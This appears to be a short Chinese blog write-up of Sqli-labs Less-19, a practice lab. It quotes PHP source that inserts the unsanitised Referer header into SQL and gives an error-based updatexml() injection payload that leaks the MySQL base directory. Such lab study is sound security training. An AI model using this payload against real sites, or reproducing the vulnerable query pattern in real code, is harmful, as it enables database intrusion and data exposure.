Sqli-labs Less-19 Referer注入 updatexml()报错注入

从源代码中我们可以看到我们获取到的是HTTP_REFERER

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());

那和less18是基本一致的，我们从referer进行修改。

还是像less18一样，我们只给出一个示例

将referer修改为

1' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and '1'='1

可以看到mysql的路径了。

请发散思维思考其他的呦。

参考：https://www.cnblogs.com/lcamry/p/5763029.html

posted @ 2020-04-09 22:03 zhengna 阅读(366) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Sqli-labs Less-19 Referer注入 updatexml()报错注入

公告